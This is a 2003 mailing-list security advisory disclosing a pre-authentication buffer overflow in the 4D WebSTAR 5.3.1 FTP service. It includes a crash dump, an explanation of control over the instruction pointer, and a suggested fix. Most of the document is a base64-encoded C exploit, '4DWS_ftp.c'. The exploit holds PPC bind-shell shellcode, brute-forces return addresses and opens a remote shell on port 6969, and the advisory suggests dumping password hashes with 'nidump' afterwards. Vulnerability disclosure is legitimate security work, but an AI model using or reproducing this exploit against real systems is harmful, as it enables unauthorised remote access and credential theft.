4D WebSTAR FTP Buffer Overflow.
Date: Fri, 12 Sep 2003 00:36:22 +0100 (BST)
From: B-r00t <[email protected]>
To: [email protected], [email protected]
Subject: 4D WebSTAR FTP Buffer Overflow.
--0-1584559136-1063323382=:6592
Content-Type: TEXT/PLAIN; charset=US-ASCII
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Remote Vulnerability in 4D WebSTAR Server Suite.
Date: 11.09.2003
Author: B-r00t. 2003.
Email: B-r00t <[email protected]>
Vendor: 4D.
Reference: http://www.4d.com/products/webstar.html
Versions: 4D WebSTAR 5.3.1 (Latest) => VULNERABLE.
Tested: 4D WebSTAR 5.3.1 (Trial Version).
Exploit: [attached] 4DWS_ftp.c - Gives a shell on port 6969.
Description: There is a pre authentication buffer overflow
that exists in the login mechanism of the WebSTAR
FTP service. As shown below: -
$ ftp maki
Connected to maki (192.168.0.69).
220 FTP server ready.
Name (maki:br00t): test
331 User name OK, need password.
Password: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXabcd
530 FTP login failed.
Login failed.
421 Service not available, remote server has closed connection
The following information is reported in the crash
logfile '/Users/webstar/Library/Logs/CrashReporter/
WSWebServer.crash.log'
**********
Date/Time: 2003-09-08 09:25:24 +0100
OS Version: 10.2.6 (Build 6L60)
Host: maki
Command: WSWebServer
PID: 359
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_INVALID_ADDRESS (0x0001) at 0x61626364
PPC Thread State:
srr0: 0x61626364 srr1: 0x4000f030 vrsave: 0x00000000
xer: 0x00000000 lr: 0x61626364 ctr: 0x90000e40 mq: 0x00000000
r0: 0x61626364 r1: 0xf02874f0 r2: 0xa0007728 r3: 0xf0288cd0
r4: 0xf02872e0 r5: 0x0000005e r6: 0x80808080 r7: 0x00000001
r8: 0x30000000 r9: 0x00954e64 r10: 0xf02870aa r11: 0x00959e94
r12: 0x00000000 r13: 0x00000000 r14: 0x00000000 r15: 0x00000000
r16: 0x00000000 r17: 0x00000000 r18: 0x00000000 r19: 0x00000000
r20: 0x00000000 r21: 0x00000000 r22: 0x00000000 r23: 0x0000000b
r24: 0x00958fec r25: 0x00958fec r26: 0x58585858 r27: 0x58585858
r28: 0x58585858 r29: 0x58585858 r30: 0x58585858 r31: 0x58585858
As can be seen from the crash dump, the application
has attempted to execute code at '0x61626364' which
is ASCII code for 'abcd'. Being able to influence the
applications execution process means it is possible
for an attacker to execute arbitrary code and thus
gain access to the target machine. Fortunately, the
service is running as the 'webstar' user which is not
an administrative account by default. However, once an
attacker has gained initial access to the target machine,
it is possible to access the system password hashes using
the 'nidump' utility and hence possibly gain admin (root)
priveleges if these hashes are cracked.
FIX: Disable the FTP service until a fix is available.
- --
B#.
- ----------------------------------------------------
Email : B-r00t <[email protected]>
Key fingerprint = 74F0 6A06 3E57 083A 4C9B
ED33 AD56 9E97 7101 5462
"You Would Be Paranoid If They Were Watching You !!!"
- -----------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (OpenBSD)
iD8DBQE/YQb/rVael3EBVGIRAkYEAJ4nwg5Y1Adl39fHb8odXHU1ff+9mQCguC93
uCfwpZGiZ7zig7iaLLTk17o=
=LN7U
-----END PGP SIGNATURE-----
--0-1584559136-1063323382=:6592
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="4DWS_ftp.c"
Content-Transfer-Encoding: BASE64
Content-ID: <[email protected]>
Content-Description:
Content-Disposition: attachment; filename="4DWS_ftp.c"
LyoNCg0KUmVtb3RlIFZ1bG5lcmFiaWxpdHkgaW4gNEQgV2ViU1RBUiBTZXJ2
ZXIgU3VpdGUuDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT0NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICANCkRhdGU6ICAgICAgICAgICAxMS4wOS4yMDAz
DQpBdXRob3I6ICAgICAgICAgQi1yMDB0LiAyMDAzLg0KRW1haWw6ICAgICAg
ICAgIEItcjAwdCA8YnIwMHRAYmx1ZXlvbmRlci5jby51az4NCldlYnBhZ2U6
CUh0dHA6Ly9kb3Jpcy5zY3JpcHRraWRkaWUubmV0DQpJUkM6CQlkb3Jpcy5z
Y3JpcHRraWRkaWUubmV0OjY2NjcgLSBTVEQNCgkJZG9yaXMuc2NyaXB0a2lk
ZGllLm5ldDo2OTY5IC0gU1NMDQoJCSNjaGVlc2UgJiAjMGRheS4NCiAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgIA0KUmVmZXJlbmNlOiAgICAgIGh0dHA6Ly93
d3cuNGQuY29tL3Byb2R1Y3RzL3dlYnN0YXIuaHRtbA0KVmVyc2lvbnM6ICAg
ICAgIDREIFdlYlNUQVIgNS4zLjEgKExhdGVzdCkgPT4gVlVMTkVSQUJMRS4N
ClRlc3RlZDogICAgICAgICA0RCBXZWJTVEFSIDUuMy4xIChUcmlhbCBWZXJz
aW9uKS4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgDQpFeHBsb2l0OiAgICAgICAgNERXU19m
dHAuYyAtIE9uIHN1Y2Nlc3MgYSBiaW5kc2hlbGwgaXMgc3Bhd25lZA0KCQlv
biBwb3J0IDY5NjkuIEFsdGhvdWdoIHRoZSByZXN1bHRpbmcgc2hlbGwgaXMN
CgkJVUlEICd3ZWJzdGFydCcsIGl0IGlzIHVzdWFsbHkgcG9zc2libGUgdG8N
CgkJZXhlY3V0ZSAnbmlkdW1wIHBhc3N3ZCAuJyB0byBvYnRhaW4gdGhlIHN5
c3RlbQ0KCQlwYXNzd29yZCBoYXNoZXMgZm9yIGNyYWNraW5nLiAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCg0KQ29t
cGlsZTogICAgICAgIGdjYyAtbyA0RFdTX2Z0cCA0RFdTX2Z0cC5jDQogICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQpE
ZXNjcmlwdGlvbjogICAgVGhlcmUgaXMgYSBwcmUgYXV0aGVudGljYXRpb24g
YnVmZmVyIG92ZXJmbG93DQogICAgICAgICAgICAgICAgdGhhdCBleGlzdHMg
aW4gdGhlIGxvZ2luIG1lY2hhbmlzbSBvZiB0aGUgV2ViU1RBUg0KICAgICAg
ICAgICAgICAgIEZUUCBzZXJ2aWNlLiBTZWUgYWR2aXNvcnkgZm9yIGZ1cnRo
ZXIgZGV0YWlscy4NCg0KUmVtZW1iZXIgS2lkZGlleiAuLi4gQW4gQXBwbGUg
QSBEYXkgLi4uISEhIQ0KKi8NCg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2lu
Y2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVk
ZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2lu
Y2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxhcnBhL2luZXQuaD4N
CiNpbmNsdWRlIDx1bmlzdGQuaD4NCiNpbmNsdWRlIDx0aW1lLmg+DQojaW5j
bHVkZSA8bmV0ZGIuaD4NCg0KLy8gRGVmaW5lcw0KI2RlZmluZSBFWFBMT0lU
CQkiNERXU19mdHAiDQojZGVmaW5lIEJJTkRTSEVMTF9QT1JUCTY5NjkNCiNk
ZWZpbmUgRlRQX1BPUlQJMjENCiNkZWZpbmUgTUFYU0laRQkJMTAyNA0KDQov
LyBQcm90b3R5cGVzDQppbnQgdXNhZ2UgKHZvaWQpOw0KaW50IGdldF9jb25u
ZWN0IChpbnQgcG9ydCwgY2hhciAqaG9zdCk7DQppbnQgc2VuZF9zb2NrIChj
aGFyICpidWZmKTsNCmludCByZWFkX3NvY2sgKGNoYXIgKmJ1ZmYpOw0KaW50
IGNoZWNrX2JpbmRzaGVsbChpbnQgcG9ydCwgY2hhciAqaG9zdCk7DQoNCi8v
VmFyaWFibGVzDQppbnQgc29jaywgcG9ydD0yMSwgbHNiOw0KY2hhciBldmls
YnVmZltNQVhTSVpFXSwgdGVtcFtNQVhTSVpFXTsNCmNoYXIgdXNlcltdID0g
IlVTRVIgNEQ0RCIgIlx4MGRceDBhIjsNCmNoYXIgcmV0YWRkeVs1XSwgZmls
bGVyW01BWFNJWkVdOw0KdW5zaWduZWQgbG9uZyBpbnQgcmV0LCBsb29wOw0K
DQppbnQgbWFpbiAoaW50IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkNCiAgICAgICAg
ew0KY2hhciBzaGVsbGNvZGVbXSA9IC8vUFBDIGZvcmtpbiBiaW5kc2hlbGwg
Njk2OSBieSBCLXIwMHQuMjAwMy4NCiJceDdjXHhhNVx4MmFceDc5XHg0MFx4
ODJceGZmXHhmZFx4N2RceDY4XHgwMlx4YTZceDNiXHhlYlx4MDFceDcwIg0K
Ilx4MzlceDgwXHgwMVx4NzBceDNiXHhkZlx4ZmZceDg4XHg3Y1x4YmVceDI5
XHhhZVx4M2JceGRmXHhmZlx4ODkiDQoiXHg3Y1x4YmVceDI5XHhhZVx4M2Jc
eGRmXHhmZlx4OGFceDdjXHhiZVx4MjlceGFlXHgzYlx4ZGZceGZmXHg4YiIN
CiJceDdjXHhiZVx4MjlceGFlXHgzOFx4NmNceGZlXHg5Mlx4MzhceDhjXHhm
ZVx4OTFceDM4XHhhY1x4ZmVceDk2Ig0KIlx4MzhceDBjXHhmZVx4ZjFceDQ0
XHhmZlx4ZmZceDAyXHg2MFx4NjBceDYwXHg2MFx4N2NceDY3XHgxYlx4Nzgi
DQoiXHgzOFx4OWZceGZmXHg4NFx4MzhceGFjXHhmZVx4YTBceDM4XHgwY1x4
ZmVceGY4XHg0NFx4ZmZceGZmXHgwMiINCiJceDYwXHg2MFx4NjBceDYwXHg3
Y1x4ZTNceDNiXHg3OFx4MzhceDhjXHhmZVx4OTFceDM4XHgwY1x4ZmVceGZh
Ig0KIlx4NDRceGZmXHhmZlx4MDJceDYwXHg2MFx4NjBceDYwXHg3Y1x4ZTNc
eDNiXHg3OFx4MzhceDhjXHhmZVx4OTAiDQoiXHgzOFx4YWNceGZlXHg5MFx4
MzhceDBjXHhmZVx4YWVceDQ0XHhmZlx4ZmZceDAyXHg2MFx4NjBceDYwXHg2
MCINCiJceDM4XHg4Y1x4ZmVceDkwXHgzOFx4MGNceGZlXHhlYVx4NDRceGZm
XHhmZlx4MDJceDYwXHg2MFx4NjBceDYwIg0KIlx4MzhceDhjXHhmZVx4OTFc
eDM4XHgwY1x4ZmVceGVhXHg0NFx4ZmZceGZmXHgwMlx4NjBceDYwXHg2MFx4
NjAiDQoiXHgzOFx4OGNceGZlXHg5Mlx4MzhceDBjXHhmZVx4ZWFceDQ0XHhm
Zlx4ZmZceDAyXHg2MFx4NjBceDYwXHg2MCINCiJceDM4XHgwY1x4ZmVceDky
XHg0NFx4ZmZceGZmXHgwMlx4NjBceDYwXHg2MFx4NjBceDM5XHgxZlx4ZmZc
eDgzIg0KIlx4N2NceGE4XHgyOVx4YWVceDM4XHg3Zlx4ZmZceDdjXHg5MFx4
NjFceGZmXHhmOFx4OTBceGExXHhmZlx4ZmMiDQoiXHgzOFx4ODFceGZmXHhm
OFx4MzhceDBjXHhmZVx4Y2JceDQ0XHhmZlx4ZmZceDAyXHg0MVx4NDFceDQx
XHg0MSINCiJceDQxXHg0MVx4NDFceDQxXHgyZlx4NjJceDY5XHg2ZVx4MmZc
eDczXHg2OFx4NThceGZmXHgwMlx4MWJceDM5Ig0KIlx4NDFceDQxXHg0MVx4
NDEiOyAvLyBZdSBDYW50IEdldCBUaGlzIFN0dWZmIEluIFN0b3JleiBNYW4h
ISENCg0KY2hhciBub3BzW10gPQ0KCSJceDYwXHg2MFx4NjBceDYwXHg2MFx4
NjBceDYwXHg2MCI7DQoNCiAgICAgICAgcHJpbnRmICgiXG4lcyBieSBCLXIw
MHQgPGJyMDB0QGJsdWV5b25kZXIuY28udWs+LiAoYykgMjAwMy5cbiIsIEVY
UExPSVQpOw0KICAgICAgICBwcmludGYgKCJcbkV4cGxvaXRzIHRoZSBwcmUg
YXV0aGVudGljYXRpb24gYnVmZmVyIG92ZXJmbG93IGluIHRoZSIpOw0KICAg
ICAgICBwcmludGYgKCJcbldlYlNUQVIgNS4zLjEgRlRQIHNlcnZpY2UuIik7
DQogICAgICAgIA0KCWlmIChhcmdjIDwgMikNCiAgICAgICAgdXNhZ2UgKCk7
DQoJDQoJcHJpbnRmICgiXG5QYXRpZW5jZSAuLi5cblxuIik7DQogICAgICAg
IA0KCW1lbXNldChmaWxsZXIsICdcMCcsIHNpemVvZihmaWxsZXIpKTsNCiAg
ICAgICAgbWVtc2V0KGZpbGxlciwgMHg3OCwgMTczKTsNCiAgICAgICAgZmls
bGVyWzBdID0gJ1AnOw0KICAgICAgICBmaWxsZXJbMV0gPSAnQSc7DQogICAg
ICAgIGZpbGxlclsyXSA9ICdTJzsNCiAgICAgICAgZmlsbGVyWzNdID0gJ1Mn
Ow0KICAgICAgICBmaWxsZXJbNF0gPSAweDIwOw0KCQ0KCWZvciAobHNiPTA7
IGxzYjw5OyBsc2IrPTQpIHsvL0luY3JlYXNlIHJhbmdlIGlmIG5vIHN1Y2Nj
ZXNzLiAgICAgICANCglmb3IgKGxvb3A9MHhmMDE4ZjUwNCtsc2I7IGxvb3A8
MHhmMDI4ZjUwNStsc2I7IGxvb3ArPTB4MTAwMCkNCiAgICAgICAgew0KICAg
ICAgICByZXQ9bG9vcDsNCglwcmludGYgKCJcblsweCV4XSAiLCByZXQpOw0K
ICAgICAgICByZXRhZGR5WzBdID0gKGludCkoKHJldCAmIDB4ZmYwMDAwMDAp
ID4+IDI0KTsNCiAgICAgICAgcmV0YWRkeVsxXSA9IChpbnQpKChyZXQgJiAw
eDAwZmYwMDAwKSA+PiAxNik7DQogICAgICAgIHJldGFkZHlbMl0gPSAoaW50
KSgocmV0ICYgMHgwMDAwZmYwMCkgPj4gOCk7DQogICAgICAgIHJldGFkZHlb
M10gPSAoaW50KSAocmV0ICYgMHgwMDAwMDBmZik7DQogICAgICAgIHJldGFk
ZHlbNF0gPSAnXDAnOw0KICAgICAgICANCgltZW1zZXQoZXZpbGJ1ZmYsICdc
MCcsIHNpemVvZihldmlsYnVmZikpOw0KICAgICAgICBzdHJjcHkgKGV2aWxi
dWZmLCBmaWxsZXIpOw0KICAgICAgICBzdHJjYXQgKGV2aWxidWZmLCByZXRh
ZGR5KTsNCiAgICAgICAgc3RyY2F0IChldmlsYnVmZiwgbm9wcyk7DQogICAg
ICAgIHN0cmNhdCAoZXZpbGJ1ZmYsIHNoZWxsY29kZSk7DQogICAgICAgIHN0
cmNhdCAoZXZpbGJ1ZmYsICJceDBkXHgwYSIpOw0KCQ0KCWlmICgoc29jaz1z
b2NrZXQoQUZfSU5FVCwgU09DS19TVFJFQU0sIDYpKSA9PSAtMSkNCgkJCQkJ
ew0KCQkJCQlwZXJyb3IoIiBSZXRyeWluZyEgIik7DQoJCQkJCWxvb3AtPTB4
MTAwMDsNCgkJCQkJc2xlZXAoMik7DQoJCQkJCWNvbnRpbnVlOw0KCQkJCQl9
DQoJDQoJaWYgKGdldF9jb25uZWN0KEZUUF9QT1JULCBhcmd2WzFdKSA9PS0x
KQ0KCQkJCQl7DQoJCQkJCXBlcnJvcigiIFJldHJ5aW5nISAiKTsNCgkJCQkJ
bG9vcC09MHgxMDAwOw0KCQkJCQlzbGVlcCgyKTsNCgkJCQkJY2xvc2Uoc29j
ayk7DQoJCQkJCWNvbnRpbnVlOw0KCQkJCQl9DQoJcmVhZF9zb2NrKHRlbXAp
Ow0KICAgICAgICBzZW5kX3NvY2sgKHVzZXIpOw0KICAgICAgICByZWFkX3Nv
Y2sodGVtcCk7DQogICAgICAgIHNlbmRfc29jayAoZXZpbGJ1ZmYpOw0KICAg
ICAgICByZWFkX3NvY2sodGVtcCk7DQoJY2xvc2Uoc29jayk7DQogICAgICAg
IHNsZWVwKDMpOy8vIExldCBzZXJ2aWNlIHJlc3Bhd24hDQoJDQoJY2hlY2tf
YmluZHNoZWxsKEJJTkRTSEVMTF9QT1JULCBhcmd2WzFdKTsNCgl9fQ0KCXBy
aW50ZigiXG5cbklmIGl0cyBzdGlsbCB1cC4uLiBHbyBBZ2FpbiFcblxuIik7
DQoJZXhpdCgwKTsNCn0vL0VuZF9NYWluDQoNCg0KLy9DaGVjayBGb3IgQmlu
ZHNoZWxsIDY5NjkNCmludCBjaGVja19iaW5kc2hlbGwoaW50IHBvcnQsIGNo
YXIgKmhvc3QpDQoJew0KCWZkX3NldCByZmRzOw0KCWludCBzZWw9MCwgcmQ9
MDsNCgljaGFyICpwdHIgPSB0ZW1wOw0KICAgICAgICBtZW1zZXQodGVtcCwg
J1wwJywgTUFYU0laRSk7DQoJDQoJaWYoKHNvY2s9c29ja2V0KEFGX0lORVQs
IFNPQ0tfU1RSRUFNLCA2KSk9PSAtMSkNCgl7DQoJcGVycm9yKCJTb2NrZXQg
RXJyb3IuIik7DQoJcmV0dXJuIC0xOw0KCX0NCgkJDQoJaWYgKGdldF9jb25u
ZWN0KHBvcnQsIGhvc3QpIDwwKQ0KCQkJCQl7CQkNCiAgICAgICAgICAgICAg
ICAJCQljbG9zZSAoc29jayk7DQogICAgICAgICAgICAgICAgCQkJcmV0dXJu
IC0xOw0KICAgICAgICAgICAgICAgIAkJCX0NCiAgICAgICAgZWxzZSBwcmlu
dGYgKCIgWWF5fiFcblxhV28wdFdvMHQhIC4uLiBXZSBnb3QgYSBzaGVsbCBv
biAlcyFcblxuPiIsIGhvc3QpOw0KCQ0KICAgICAgICAvLyBTdGFydCBjbGVh
biAuLg0KCWZmbHVzaChzdGRpbik7DQogICAgICAgIGZmbHVzaChzdGRvdXQp
Ow0KICAgICAgICBmZmx1c2goc3RkZXJyKTsNCg0KCWRvIHsNCiAgICAgICAg
IEZEX1pFUk8oJnJmZHMpOw0KICAgICAgICAgRkRfU0VUKDAsICZyZmRzKTsN
CiAgICAgICAgIEZEX1NFVChzb2NrLCAmcmZkcyk7DQogICAgICAgICBzZWw9
c2VsZWN0KHNvY2srMSwgJnJmZHMsIE5VTEwsIE5VTEwsIE5VTEwpOw0KCW1l
bXNldCh0ZW1wLCAnXDAnLCBNQVhTSVpFKTsNCglpZiAoc2VsKSB7DQogICAg
ICAgIA0KCSBpZihGRF9JU1NFVChzb2NrLCAmcmZkcykpIHsNCgkJCQkJcmQ9
KHJlYWRfc29jayh0ZW1wKSk7DQoJCQkJCXByaW50ZigiJXMiLCB0ZW1wKTsN
CiAgICAgICAgICAgICAgIAkJCQl9DQogICAgICAgICBpZihGRF9JU1NFVCgw
LCAmcmZkcykpIHsNCgkJCQkJcmQ9KHJlYWQoMCwgcHRyLCBNQVhTSVpFLTEp
KTsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAJCXNlbmRfc29j
ayh0ZW1wKTsNCiAgICAgICAgICAgICAgICAgICAgICAJCQl9DQoJCQl9DQog
ICAgICAgIH0gd2hpbGUoIHNlbCAmJiByZCApOw0KICAgICAgICBjbG9zZShz
b2NrKTsNCglwcmludGYgKCJcblNoZWxsIEFib3J0ZWQhXG4iKTsNCglleGl0
KDApOw0KfQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICANCg0KDQovL0RvIFNvY2tldCBDb25u
ZWN0DQppbnQgZ2V0X2Nvbm5lY3QgKGludCBwb3J0LCBjaGFyICpob3N0KQ0K
ICAgICAgICB7DQogICAgICAgIHN0cnVjdCBzb2NrYWRkcl9pbiBkZXN0X2Fk
ZHI7DQoJZGVzdF9hZGRyLnNpbl9mYW1pbHkgPSBBRl9JTkVUOw0KICAgICAg
ICBkZXN0X2FkZHIuc2luX3BvcnQgPSBodG9ucyhwb3J0KTsNCiAgICAgICAg
aWYgKCEgaW5ldF9hdG9uKGhvc3QsICYoZGVzdF9hZGRyLnNpbl9hZGRyKSkp
DQogICAgICAgICAgICAgICAgcmV0dXJuIC0xOw0KICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICANCiAgICAgICAgbWVtc2V0KCAmKGRlc3RfYWRkci5zaW5femVybyks
ICdcMCcsIDgpOw0KICAgICAgICBpZiAoY29ubmVjdCAoc29jaywgKHN0cnVj
dCBzb2NrYWRkciAqKSZkZXN0X2FkZHIsIHNpemVvZiAoc3RydWN0IHNvY2th
ZGRyKSkgPT0gLTEpDQoJCXsNCgkJcHJpbnRmKCIgRmFpbCEiKTsNCgkJY2xv
c2Uoc29jayk7DQogICAgICAgICAgICAgICAgcmV0dXJuIC0xOw0KCQl9DQog
ICAgICAgIGVsc2UgcmV0dXJuIDA7DQp9DQogICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
IA0KLy9TZW5kIERhdGEgVG8gU29ja2V0DQppbnQgc2VuZF9zb2NrIChjaGFy
ICpidWZmKQ0KICAgICAgICB7DQogICAgICAgIGludCBieXRlcyA9IDA7DQog
ICAgICAgIGJ5dGVzID0gKHNlbmQgKHNvY2ssIGJ1ZmYsIHN0cmxlbihidWZm
KSwgMCkpOw0KCQlpZiAoYnl0ZXMgPT0gLTEpIA0KCQl7DQoJCXBlcnJvcigi
U2VuZCBFcnJvci4iKTsNCgkJY2xvc2Uoc29jayk7DQoJCXJldHVybiAtMTsN
CgkJfQ0KCWVsc2UgcmV0dXJuIGJ5dGVzOw0KfQ0KDQovL1JlYWQgRGF0YSBG
cm9tIFNvY2tldA0KaW50IHJlYWRfc29jayAoY2hhciAqYnVmZikNCiAgICAg
ICAgew0KICAgICAgICBpbnQgYnl0ZXMgPSAwOw0KICAgICAgICBieXRlcyA9
IChyZWN2IChzb2NrLCBidWZmLCBNQVhTSVpFLTEsIDApKTsNCiAgICAgICAg
ICAgICAgICBpZiAoYnl0ZXMgPT0gLTEpIA0KCQl7DQoJCXBlcnJvciAoIlJl
Y3YgRXJyb3IuIik7DQoJCWNsb3NlKHNvY2spOw0KCQlyZXR1cm4gLTE7DQoJ
CX0NCgllbHNlIHJldHVybiBieXRlczsNCn0NCg0KLy9Vc2FnZSBNZXNzYWdl
DQppbnQgdXNhZ2UgKHZvaWQpDQogICAgICAgIHsNCiAgICAgICAgcHJpbnRm
ICgiXG5cblVzYWdlOiAlcyBbSVBfQUREUkVTU10gIiwgRVhQTE9JVCk7DQog
ICAgICAgIHByaW50ZiAoIlxuRXhhbXBsZTogJXMgMTAuMC4wLjEgXG5cbiIs
IEVYUExPSVQpOw0KICAgICAgICBleGl0ICgtMSk7DQp9DQoNCi8qIFNob3V0
ejogICAgICBIYWdnaXMgRm9yIFN1cHBseWluZyBQZXN0aWNpZGUgJiBQYXRp
ZW5jZS4JKi8NCi8qCQlNYXJzaGFsLWwsIFJ1eDByLCBtYWNhdml0eSwgTXVt
ICYgRGFkLgkJKi8NCi8qICAgICAgICAgICAgICBUaGUgZG9yaXMuc2NyaXB0
a2lkZGllLm5ldCBwb3NzZSEgICAgICAgICAgICAgICAqLw0KLyogICAgICAg
ICAgICAgIFRoYXQgT25lIERvcmlzIC4uLiBVLUtub3ctV2hvLVUtUiEgICAg
ICAgICAgICAgICovDQovKgkJCQkJCQkJKi8NCi8qIERlZGljYXRlZDogICBT
YWQgQXBwbGUgU2xhc2hkb3QgVHJvbGx6IC0gJ05vdyBZYSBHZXQgaVQgPycg
ICAqLw0KLyogVEhFIEVORCAtIEFNRU4uICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICovDQoNCg0K
--0-1584559136-1063323382=:6592--
